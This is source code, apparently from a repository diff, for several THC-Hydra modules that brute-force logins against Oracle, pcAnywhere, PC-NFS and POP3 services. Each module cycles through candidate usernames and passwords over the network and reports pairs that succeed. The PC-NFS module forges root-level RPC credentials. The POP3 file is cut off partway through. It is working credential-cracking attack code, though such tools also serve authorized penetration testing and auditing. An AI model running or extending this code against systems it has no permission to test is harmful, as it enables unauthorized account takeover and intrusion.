hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
switch (run) {
case 1: /* connect and service init function */
if (sock >= 0)
sock = hydra_disconnect(sock);
// usleep(300000);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(ip, mysslport);
port = mysslport;
}
if (sock < 0) {
hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
/* run the cracking function */
next_run = start_oracle_sid(sock, ip, port, options, miscptr, fp);
break;
case 3: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(0);
return;
case 4:
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(2);
return;
default:
hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(0);
}
run = next_run;
}
}
int service_oracle_sid_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}
#endif

191
hydra-oracle.c Normal file
View file

@ -0,0 +1,191 @@
/*
david: code is based on SNORT spo_database.c
tested with :
-instantclient_10_2 on Oracle 10.2.0
-instantclient-basic-linux.*-11.2.0.3.0.zip + instantclient-sdk-linux.*-11.2.0.3.0.zip
on Oracle 9i and on Oracle 11g
*/
#include "hydra-mod.h"
#ifndef LIBORACLE
void dummy_oracle() {
printf("\n");
}
#else
#include <oci.h>
#include <sys/types.h>
extern char *HYDRA_EXIT;
OCIEnv *o_environment;
OCISvcCtx *o_servicecontext;
OCIBind *o_bind;
OCIError *o_error;
OCIStmt *o_statement;
OCIDefine *o_define;
text o_errormsg[512];
sb4 o_errorcode;
void print_oracle_error(char *err) {
if (verbose) {
OCIErrorGet(o_error, 1, NULL, &o_errorcode, o_errormsg, sizeof(o_errormsg), OCI_HTYPE_ERROR);
fprintf(stderr, "[ERROR] Oracle_error: %s - %s\n", o_errormsg, err);
}
}
int start_oracle(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "";
char *login, *pass, buffer[200], sid[100];
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
strncpy(sid, miscptr, sizeof(sid) - 1);
sid[sizeof(sid) - 1] = 0;
snprintf(buffer, sizeof(buffer), "//%s:%d/%s", hydra_address2string(ip), port, sid);
/*
To use the Easy Connect naming method, PHP must be linked with Oracle 10g or greater Client libraries.
The Easy Connect string for Oracle 10g is of the form: [//]host_name[:port][/service_name].
With Oracle 11g, the syntax is: [//]host_name[:port][/service_name][:server_type][/instance_name].
Service names can be found by running the Oracle utility lsnrctl status on the database server machine.
The tnsnames.ora file can be in the Oracle Net search path, which includes $ORACLE_HOME/network/admin
and /etc. Alternatively set TNS_ADMIN so that $TNS_ADMIN/tnsnames.ora is read. Make sure the web
daemon has read access to the file.
*/
if (OCIInitialize(OCI_DEFAULT, NULL, NULL, NULL, NULL)) {
print_oracle_error("OCIInitialize");
return 4;
}
if (OCIEnvInit(&o_environment, OCI_DEFAULT, 0, NULL)) {
print_oracle_error("OCIEnvInit");
return 4;
}
if (OCIEnvInit(&o_environment, OCI_DEFAULT, 0, NULL)) {
print_oracle_error("OCIEnvInit 2");
return 4;
}
if (OCIHandleAlloc(o_environment, (dvoid **) & o_error, OCI_HTYPE_ERROR, (size_t) 0, NULL)) {
print_oracle_error("OCIHandleAlloc");
return 4;
}
if (OCILogon(o_environment, o_error, &o_servicecontext, (const OraText *) login, strlen(login), (const OraText *) pass, strlen(pass), (const OraText *) buffer, strlen(buffer))) {
OCIErrorGet(o_error, 1, NULL, &o_errorcode, o_errormsg, sizeof(o_errormsg), OCI_HTYPE_ERROR);
//database: oracle_error: ORA-01017: invalid username/password; logon denied
//database: oracle_error: ORA-12514: TNS:listener does not currently know of service requested in connect descriptor
//database: oracle_error: ORA-28000: the account is locked
//Failed login attempts is set to 10 by default
if (verbose) {
hydra_report(stderr, "[VERBOSE] database: oracle_error: %s\n", o_errormsg);
}
if (strstr((const char *) o_errormsg, "ORA-12514") != NULL) {
hydra_report(stderr, "[ERROR] ORACLE SID is not valid, you should try to enumerate them.\n");
}
if (strstr((const char *) o_errormsg, "ORA-28000") != NULL) {
hydra_report(stderr, "[ERROR] ORACLE account %s is locked.\n", login);
}
if (o_error) {
OCIHandleFree((dvoid *) o_error, OCI_HTYPE_ERROR);
}
hydra_completed_pair();
//by default, set in sqlnet.ora, the trace file is generated in pwd to log any errors happening,
//as we don't care, we are deleting the file
//set these parameters to not generate the file
//LOG_DIRECTORY_CLIENT = /dev/null
//LOG_FILE_CLIENT = /dev/null
unlink("sqlnet.log");
return 2;
} else {
OCILogoff(o_servicecontext, o_error);
if (o_error) {
OCIHandleFree((dvoid *) o_error, OCI_HTYPE_ERROR);
}
hydra_report_found_host(port, ip, "oracle", fp);
hydra_completed_pair_found();
}
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
void service_oracle(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1;
int myport = PORT_ORACLE;
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
if ((miscptr == NULL) || (strlen(miscptr) == 0)) {
//SID is required as miscptr
hydra_report(stderr, "[ERROR] Oracle SID is required, using ORCL as default\n");
miscptr = "ORCL";
}
while (1) {
switch (run) {
case 1: /* connect and service init function */
if (sock >= 0)
sock = hydra_disconnect(sock);
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
if (sock < 0) {
if (verbose || debug)
hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
next_run = 2;
break;
case 2:
next_run = start_oracle(sock, ip, port, options, miscptr, fp);
hydra_child_exit(0);
break;
case 3: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(0);
return;
default:
hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(2);
}
run = next_run;
}
}
#endif
int service_oracle_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}

286
hydra-pcanywhere.c Normal file
View file

@ -0,0 +1,286 @@
//This plugin was written by <david dot maciejak at kyxar dot fr>
//
//PC-Anywhere authentication protocol test on Symantec PC-Anywhere 10.5
//
// no memleaks found on 110425
#include "hydra-mod.h"
extern char *HYDRA_EXIT;
int pcadebug = 0;
int send_cstring(int s, char *crypted_string) {
char buffer2[100], *bptr = buffer2;
char clientcryptheader[] = "\x06";
memset(buffer2, 0, sizeof(clientcryptheader));
bptr = buffer2;
buffer2[0] = 6;
bptr++;
buffer2[1] = strlen(crypted_string);
bptr++;
strcpy(bptr, crypted_string);
return hydra_send(s, buffer2, 2 + strlen(crypted_string), 0);
}
void show_buffer(char *buffer, int size) {
int i;
printf("size: %d, buffer:\n", size);
for (i = 0; i < size; i++) {
printf("%c", buffer[i]);
}
printf("\n");
}
void clean_buffer(char *buf, int size) {
int i;
for (i = 0; i < size; i++) {
int pos = buf[i];
if (pos < 32 || pos > 126) {
// . char
buf[i] = 46;
}
}
}
void print_encrypted_str(char *str) {
int i;
printf("encode string: ");
for (i = 0; i < strlen(str); i++) {
printf("%x ", str[i]);
}
printf("\n");
}
void pca_encrypt(char *cleartxt) {
char passwd[128];
int i;
strcpy(passwd, cleartxt);
if (strlen(cleartxt) > 0) {
passwd[0] = (passwd[0] ^ 0xab);
for (i = 1; i < strlen(passwd); i++)
passwd[i] = passwd[i - 1] ^ passwd[i] ^ (i - 1);
passwd[strlen(passwd)] = '\0';
strcpy(cleartxt, passwd);
}
}
void pca_decrypt(char *password) {
char cleartext[128];
int i;
if (strlen(password) > 0) {
cleartext[0] = password[0] ^ 0xab;
for (i = 1; i < strlen(password); i++)
cleartext[i] = password[i - 1] ^ password[i] ^ (i - 1);
cleartext[strlen(password)] = '\0';
strcpy(password, cleartext);
}
}
void debugprintf(char *msg) {
if (pcadebug)
printf("debug: %s\n", msg);
}
int start_pcanywhere(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "";
char *login, *pass;
char buffer[2048] = "";
char clogin[128] = "";
char cpass[128] = "";
int ret, i;
char *client[4];
char *server[5];
int clientsize[4];
client[0] = "\x00\x00\x00\x00";
clientsize[0] = 4;
client[1] = "\x6F\x06\xff";
clientsize[1] = 3;
client[2] = "\x6f\x61\x00\x09\x00\xfe\x00\x00\xff\xff\x00\x00\x00\x00";
clientsize[2] = 14;
client[3] = "\x6f\x62\x01\x02\x00\x00\x00";
clientsize[3] = 7;
server[0] = "nter";
server[1] = "\x1B\x61";
server[2] = "\0x1B\0x62";
server[3] = "Enter login name";
server[4] = "denying connection";
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
debugprintf("dans pcanywhere start");
/*printf("testing %s:%s\n",login,pass); */
strcpy(clogin, login);
strcpy(cpass, pass);
pca_encrypt(clogin);
pca_encrypt(cpass);
for (i = 0; i < 4; i++) {
if (hydra_send(s, client[i], clientsize[i], 0) < 0) {
return 1;
}
ret = hydra_recv(s, buffer, sizeof(buffer));
if (ret == -1) {
return 1;
}
if (i == 3) {
if (ret == 3) {
/*one more to get the login prompt */
ret = hydra_recv(s, buffer, sizeof(buffer));
}
}
if (i == 0 || i == 3)
clean_buffer(buffer, ret);
/*show_buffer(buffer,ret); */
if (i == 2) {
clean_buffer(buffer, ret);
if (strstr(buffer, server[i + 2]) != NULL) {
fprintf(stderr, "[ERROR] PC Anywhere host denying connection because you have requested a lower encrypt level\n");
return 3;
}
}
if (strstr(buffer, server[i]) == NULL) {
if (i == 3) {
debugprintf("problem receiving login banner");
}
return 1;
}
}
if (send_cstring(s, clogin) < 0) {
return 1;
}
ret = hydra_recv(s, buffer, sizeof(buffer));
if (ret == -1) {
return 1;
}
clean_buffer(buffer, ret);
/*show_buffer(buffer,ret); */
if (strstr(buffer, "Enter password:") == NULL) {
debugprintf("problem receiving password banner");
return 1;
}
if (send_cstring(s, cpass) < 0) {
return 1;
}
ret = hydra_recv(s, buffer, sizeof(buffer));
if (ret == -1) {
return 1;
}
clean_buffer(buffer, ret);
/*show_buffer(buffer,ret); */
if ((strstr(buffer, "Invalid login") != NULL) || (strstr(buffer, "Enter password") != NULL)) {
debugprintf("login/passwd wrong");
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 2;
} else {
debugprintf("cool find login/passwd");
hydra_report_found_host(port, ip, "pcanywhere", fp);
hydra_completed_pair_found();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 2;
}
return 1;
}
void service_pcanywhere(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1;
int myport = PORT_PCANYWHERE, mysslport = PORT_PCANYWHERE_SSL;
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
switch (run) {
case 1: /* connect and service init function */
if (sock >= 0)
sock = hydra_disconnect(sock);
usleep(275000);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(ip, mysslport);
port = mysslport;
}
if (sock < 0) {
fprintf(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
next_run = 2;
break;
case 2:
next_run = start_pcanywhere(sock, ip, port, options, miscptr, fp);
break;
case 3:
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(0);
return;
default:
fprintf(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(0);
}
run = next_run;
}
}
int service_pcanywhere_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}

198
hydra-pcnfs.c Normal file
View file

@ -0,0 +1,198 @@
#include "hydra-mod.h"
/* pcnfs stuff copied from prout.c */
extern char *HYDRA_EXIT;
char *buf;
#define LEN_HDR_RPC 24
#define LEN_AUTH_UNIX 72+12
/* RPC common hdr */
struct rpc_hdr { /* 24 */
unsigned long xid;
unsigned long type_msg;
unsigned long version_rpc;
unsigned long prog_id;
unsigned long prog_ver;
unsigned long prog_proc;
};
struct pr_auth_args {
unsigned long len_clnt;
char name[64];
unsigned long len_id;
char id[32];
unsigned long len_passwd;
char passwd[64];
unsigned long len_comments;
char comments[255];
};
#define LEN_HDR_PCN_AUTH sizeof(struct pr_auth_args)
/* Lets start ... */
int start_pcnfs(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "";
char *login, *pass, buffer[LEN_HDR_RPC + LEN_AUTH_UNIX + LEN_HDR_PCN_AUTH];
char *ptr, *pkt = buffer;
unsigned long *authp;
struct timeval tv;
struct rpc_hdr *rpch;
struct pr_auth_args *prh;
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
memset(pkt, 0, sizeof(buffer));
rpch = (struct rpc_hdr *) (pkt);
authp = (unsigned long *) (pkt + LEN_HDR_RPC);
prh = (struct pr_auth_args *) (pkt + LEN_HDR_RPC + LEN_AUTH_UNIX);
rpch->xid = htonl(0x32544843);
rpch->type_msg = htonl(0);
rpch->version_rpc = htonl(2);
rpch->prog_id = htonl(150001);
rpch->prog_ver = htonl(2);
rpch->prog_proc = htonl(13); /* PCNFSD_PROC_PRAUTH */
prh->len_clnt = htonl(63);
prh->len_id = htonl(31);
prh->len_passwd = htonl(63);
prh->len_comments = htonl(254);
strcpy(prh->comments, " Hydra - THC password cracker - visit http://www.thc.org - use only allowed for legal purposes ");
strcpy(prh->name, "localhost");
ptr = prh->id;
while (*login) {
*ptr++ = (*login ^ 0x5b) & 0x7f;
login++;
}
*ptr = 0;
ptr = prh->passwd;
while (*pass) {
*ptr++ = (*pass ^ 0x5b) & 0x7f;
pass++;
}
*ptr = 0;
gettimeofday(&tv, (struct timezone *) NULL);
*(authp) = htonl(1); /* auth unix */
*(++authp) = htonl(LEN_AUTH_UNIX - 16); /* length auth */
*(++authp) = htonl(tv.tv_sec); /* local time */
*(++authp) = htonl(9); /* length host */
strcpy((char *) ++authp, "localhost"); /* hostname */
authp += (3); /* len(host)%4 */
*(authp) = htonl(0); /* uid root */
*(++authp) = htonl(0); /* gid root */
*(++authp) = htonl(9); /* 9 gid grps */
/* group root, bin, daemon, sys, adm, disk, wheel, floppy, "user gid" */
*(++authp) = htonl(0);
*(++authp) = htonl(1);
*(++authp) = htonl(2);
*(++authp) = htonl(3);
*(++authp) = htonl(4);
*(++authp) = htonl(6);
*(++authp) = htonl(10);
*(++authp) = htonl(11);
*(++authp) = htonl(0);
if (hydra_send(s, buffer, sizeof(buffer), 0) < 0) {
fprintf(stderr, "[ERROR] Could not send data to remote server, reconnecting ...\n");
return 1;
}
if ((buf = hydra_receive_line(s)) == NULL) {
fprintf(stderr, "[ERROR] Timeout from remote server, reconnecting ...\n");
return 1;
}
/* analyze the output */
if (buf[2] != 'g' || buf[5] != 32) {
fprintf(stderr, "[ERROR] RPC answer status : bad proc/version/auth\n");
free(buf);
return 3;
}
if (buf[27] == 32 && buf[28] == 32 && buf[29] == 32) {
hydra_report_found_host(port, ip, "pcnfs", fp);
hydra_completed_pair_found();
free(buf);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
} else {
hydra_completed_pair();
free(buf);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
}
return 1;
}
void service_pcnfs(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1;
hydra_register_socket(sp);
if (port == 0) {
fprintf(stderr, "[ERROR] pcnfs module called without -s port!\n");
hydra_child_exit(0);
}
if ((options & OPTION_SSL) != 0) {
fprintf(stderr, "[ERROR] pcnfs module can not be used with SSL!\n");
hydra_child_exit(0);
}
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
next_run = 0;
switch (run) {
case 1: /* connect and service init function */
{
if (sock >= 0)
sock = hydra_disconnect(sock);
// usleep(275000);
if ((sock = hydra_connect_udp(ip, port)) < 0) {
fprintf(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
next_run = 2;
break;
}
case 2: /* run the cracking function */
next_run = start_pcnfs(sock, ip, port, options, miscptr, fp);
break;
case 3: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(0);
return;
default:
fprintf(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(0);
}
run = next_run;
}
}
int service_pcnfs_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}

771
hydra-pop3.c Normal file
View file

@ -0,0 +1,771 @@
#include "hydra-mod.h"
#include "sasl.h"
//openssl s_client -starttls pop3 -crlf -connect 192.168.0.10:110
typedef struct pool_str {
char ip[36];
/* int port;*/// not needed
int pop3_auth_mechanism;
int disable_tls;
struct pool_str *next;
} pool;
extern char *HYDRA_EXIT;
char *buf;
char apop_challenge[300] = "";
pool *plist = NULL, *p = NULL;
/* functions */
int service_pop3_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port);
pool *list_create(pool data) {
pool *p;
if (!(p = malloc(sizeof(pool))))
return NULL;
memcpy(p->ip, data.ip, 36);
//p->port = data.port;
p->pop3_auth_mechanism = data.pop3_auth_mechanism;
p->disable_tls = data.disable_tls;
p->next = NULL;
return p;
}
pool *list_insert(pool data) {
pool *newnode;
newnode = list_create(data);
newnode->next = plist;
plist = newnode->next; // to be sure!
return newnode;
}
pool *list_find(char *ip) {
pool *node = plist;
while (node != NULL) {
if (memcmp(node->ip, ip, 36) == 0)
return node;
node = node->next;
}
return NULL;
}
/* how to know when to release the mem ?
-> well, after _start has determined which pool number it is */
int list_remove(pool * node) {
pool *save, *list = plist;
int ok = -1;
if (list == NULL || node == NULL)
return -2;
do {
save = list->next;
if (list != node)
free(list);
else
ok = 0;
list = save;
} while (list != NULL);
return ok;
}
char *pop3_read_server_capacity(int sock) {
char *ptr = NULL;
int resp = 0;
char *buf = NULL;
do {
if (buf != NULL)
free(buf);
ptr = buf = hydra_receive_line(sock);
if (buf != NULL) {
/*
exchange capa:
+OK
UIDL
STLS
*/
if (strstr(buf, "\r\n.\r\n") != NULL && buf[0] == '+') {
resp = 1;
/* we got the capability info then get the completed warning info from server */
while (hydra_data_ready(sock)) {
free(buf);
buf = hydra_receive_line(sock);
}
} else {
if (buf[strlen(buf) - 1] == '\n')
buf[strlen(buf) - 1] = 0;
if (buf[strlen(buf) - 1] == '\r')
buf[strlen(buf) - 1] = 0;
if (*(ptr) == '.' || *(ptr) == '-')
resp = 1;
}
}
} while (buf != NULL && resp == 0);
return buf;
}
int start_pop3(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "\"\"";
char *login, *pass, buffer[500], buffer2[500];
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
while (hydra_data_ready(s) > 0) {
if ((buf = hydra_receive_line(s)) == NULL)
return 4;
free(buf);
}
switch (p->pop3_auth_mechanism) {
#ifdef LIBOPENSSL
case AUTH_APOP:{
MD5_CTX c;
unsigned char md5_raw[MD5_DIGEST_LENGTH];
int i;
char *pbuffer = buffer2;
MD5_Init(&c);
MD5_Update(&c, apop_challenge, strlen(apop_challenge));
MD5_Update(&c, pass, strlen(pass));
MD5_Final(md5_raw, &c);
for (i = 0; i < MD5_DIGEST_LENGTH; i++) {
sprintf(pbuffer, "%02x", md5_raw[i]);
pbuffer += 2;
}
sprintf(buffer, "APOP %s %s\r\n", login, buffer2);
}
break;
#endif
case AUTH_LOGIN:{
sprintf(buffer, "AUTH LOGIN\r\n");
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
if ((buf = hydra_receive_line(s)) == NULL)
return 4;
if (buf[0] != '+') {
hydra_report(stderr, "[ERROR] POP3 LOGIN AUTH : %s\n", buf);
free(buf);
return 3;
}
free(buf);
strcpy(buffer2, login);
hydra_tobase64((unsigned char *) buffer2, strlen(buffer2), sizeof(buffer2));
sprintf(buffer, "%.250s\r\n", buffer2);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
if ((buf = hydra_receive_line(s)) == NULL)
return 4;
if (buf[0] != '+') {
hydra_report(stderr, "[ERROR] POP3 LOGIN AUTH : %s\n", buf);
free(buf);
return 3;
}
free(buf);
strcpy(buffer2, pass);
hydra_tobase64((unsigned char *) buffer2, strlen(buffer2), sizeof(buffer2));
sprintf(buffer, "%.250s\r\n", buffer2);
}
break;
case AUTH_PLAIN:{
sprintf(buffer, "AUTH PLAIN\r\n");
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
if ((buf = hydra_receive_line(s)) == NULL)
return 4;
if (buf[0] != '+') {
hydra_report(stderr, "[ERROR] POP3 PLAIN AUTH : %s\n", buf);
free(buf);
return 3;
}
free(buf);
memset(buffer, 0, sizeof(buffer));
sasl_plain(buffer, login, pass);
sprintf(buffer, "%.250s\r\n", buffer);
}
break;
#ifdef LIBOPENSSL
case AUTH_CRAMMD5:
case AUTH_CRAMSHA1:
case AUTH_CRAMSHA256:{
int rc = 0;
char *preplogin;
rc = sasl_saslprep(login, SASL_ALLOW_UNASSIGNED, &preplogin);
if (rc) {
return 3;
}
switch (p->pop3_auth_mechanism) {
case AUTH_CRAMMD5:
sprintf(buffer, "AUTH CRAM-MD5\r\n");
break;
case AUTH_CRAMSHA1:
sprintf(buffer, "AUTH CRAM-SHA1\r\n");
break;
case AUTH_CRAMSHA256:
sprintf(buffer, "AUTH CRAM-SHA256\r\n");
break;
}
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
//get the one-time BASE64 encoded challenge
if ((buf = hydra_receive_line(s)) == NULL)
return 4;
if (buf[0] != '+') {
switch (p->pop3_auth_mechanism) {
case AUTH_CRAMMD5:
hydra_report(stderr, "[ERROR] POP3 CRAM-MD5 AUTH : %s\n", buf);
break;
case AUTH_CRAMSHA1:
hydra_report(stderr, "[ERROR] POP3 CRAM-SHA1 AUTH : %s\n", buf);
break;
case AUTH_CRAMSHA256:
hydra_report(stderr, "[ERROR] POP3 CRAM-SHA256 AUTH : %s\n", buf);
break;
}
free(buf);
return 3;
}
memset(buffer, 0, sizeof(buffer));
from64tobits((char *) buffer, buf + 2);
free(buf);
memset(buffer2, 0, sizeof(buffer2));
switch (p->pop3_auth_mechanism) {
case AUTH_CRAMMD5:{
sasl_cram_md5(buffer2, pass, buffer);
sprintf(buffer, "%s %.250s", preplogin, buffer2);
}
break;
case AUTH_CRAMSHA1:{
sasl_cram_sha1(buffer2, pass, buffer);
sprintf(buffer, "%s %.250s", preplogin, buffer2);
}
break;
case AUTH_CRAMSHA256:{
sasl_cram_sha256(buffer2, pass, buffer);
sprintf(buffer, "%s %.250s", preplogin, buffer2);
}
break;
}
hydra_tobase64((unsigned char *) buffer, strlen(buffer), sizeof(buffer));
sprintf(buffer, "%.250s\r\n", buffer);
free(preplogin);
}
break;
case AUTH_DIGESTMD5:{
sprintf(buffer, "AUTH DIGEST-MD5\r\n");
if (hydra_send(s, buffer, strlen(buffer), 0) < 0)
return 1;
//receive
if ((buf = hydra_receive_line(s)) == NULL)
return 4;
if (buf[0] != '+') {
hydra_report(stderr, "[ERROR] POP3 DIGEST-MD5 AUTH : %s\n", buf);
free(buf);
return 3;
}
memset(buffer, 0, sizeof(buffer));
from64tobits((char *) buffer, buf);
free(buf);
if (verbose)
hydra_report(stderr, "[VERBOSE] S: %s\n", buffer);
sasl_digest_md5(buffer2, login, pass, buffer, miscptr, "pop", NULL, 0, NULL);
if (buffer2 == NULL)
return 3;
if (verbose)
hydra_report(stderr, "[VERBOSE] C: %s\n", buffer2);
hydra_tobase64((unsigned char *) buffer2, strlen(buffer2), sizeof(buffer2));
sprintf(buffer, "%s\r\n", buffer2);
}
break;
#endif
case AUTH_NTLM:{
unsigned char buf1[4096];
unsigned char buf2[4096];
//Send auth request
sprintf(buffer, "AUTH NTLM\r\n");
if (hydra_send(s, buffer, strlen(buffer), 0) < 0)
return 1;
//receive
if ((buf = hydra_receive_line(s)) == NULL)
return 4;
if (buf[0] != '+') {
hydra_report(stderr, "[ERROR] POP3 NTLM AUTH : %s\n", buf);
free(buf);
return 3;
}
free(buf);
//send auth and receive challenge
//send auth request: lst the server send it's own hostname and domainname
buildAuthRequest((tSmbNtlmAuthRequest *) buf2, 0, NULL, NULL);
to64frombits(buf1, buf2, SmbLength((tSmbNtlmAuthRequest *) buf2));
sprintf(buffer, "%s\r\n", buf1);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0)
return 1;
if ((buf = hydra_receive_line(s)) == NULL)
return 4;
//recover challenge
from64tobits((char *) buf1, buf + 2);
free(buf);
//Send response
buildAuthResponse((tSmbNtlmAuthChallenge *) buf1, (tSmbNtlmAuthResponse *) buf2, 0, login, pass, NULL, NULL);
to64frombits(buf1, buf2, SmbLength((tSmbNtlmAuthResponse *) buf2));
sprintf(buffer, "%s\r\n", buf1);
}
break;
default:
sprintf(buffer, "USER %.250s\r\n", login);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
if ((buf = hydra_receive_line(s)) == NULL)
return 4;
if (buf[0] != '+') {
hydra_report(stderr, "[ERROR] POP3 protocol or service shutdown: %s\n", buf);
free(buf);
return (3);
}
free(buf);
sprintf(buffer, "PASS %.250s\r\n", pass);
}
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
if ((buf = hydra_receive_line(s)) == NULL) {
return 4;
}
if (buf[0] == '+') {
hydra_report_found_host(port, ip, "pop3", fp);
hydra_completed_pair_found();
free(buf);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
/* special AS/400 hack */
if (strstr(buf, "CPF2204") != NULL || strstr(buf, "CPF22E3") != NULL || strstr(buf, "CPF22E4") != NULL || strstr(buf, "CPF22E5") != NULL) {
hydra_completed_pair_skip();
free(buf);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
free(buf);
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 2;
}
void service_pop3(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1, i;
char *ptr = NULL;
//extract data from the pool, ip is the key
if (plist == NULL)
if (service_pop3_init(ip, sp, options, miscptr, fp, port) != 0)
hydra_child_exit(2);
p = list_find(ip);
if (p == NULL) {
hydra_report(stderr, "[ERROR] Could not find ip %s in pool\n", hydra_address2string(ip));
return;
}
if (list_remove(p) != 0)
hydra_report(stderr, "[ERROR] Could not find ip %s in pool to free memory\n", hydra_address2string(ip));
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
switch (run) {
case 1: /* connect and service init function */
if (sock >= 0)
sock = hydra_disconnect(sock);
// usleep(300000);
if ((options & OPTION_SSL) == 0) {
sock = hydra_connect_tcp(ip, port);
} else {
sock = hydra_connect_ssl(ip, port);
}
if (sock < 0) {
if (verbose || debug)
hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
buf = hydra_receive_line(sock);
if (buf == NULL || buf[0] != '+') { /* check the first line */
if (verbose || debug)
hydra_report(stderr, "[ERROR] Not an POP3 protocol or service shutdown: %s\n", buf);
hydra_child_exit(2);
}
ptr = strstr(buf, "<");
if (ptr != NULL && buf[0] == '+') {
if (ptr[strlen(ptr) - 1] == '\n')
ptr[strlen(ptr) - 1] = 0;
if (ptr[strlen(ptr) - 1] == '\r')
ptr[strlen(ptr) - 1] = 0;
strcpy(apop_challenge, ptr);
}
free(buf);
#ifdef LIBOPENSSL
if (!p->disable_tls) {
/* check for STARTTLS, if available we may have access to more basic auth methods */
hydra_send(sock, "STLS\r\n", strlen("STLS\r\n"), 0);
buf = hydra_receive_line(sock);
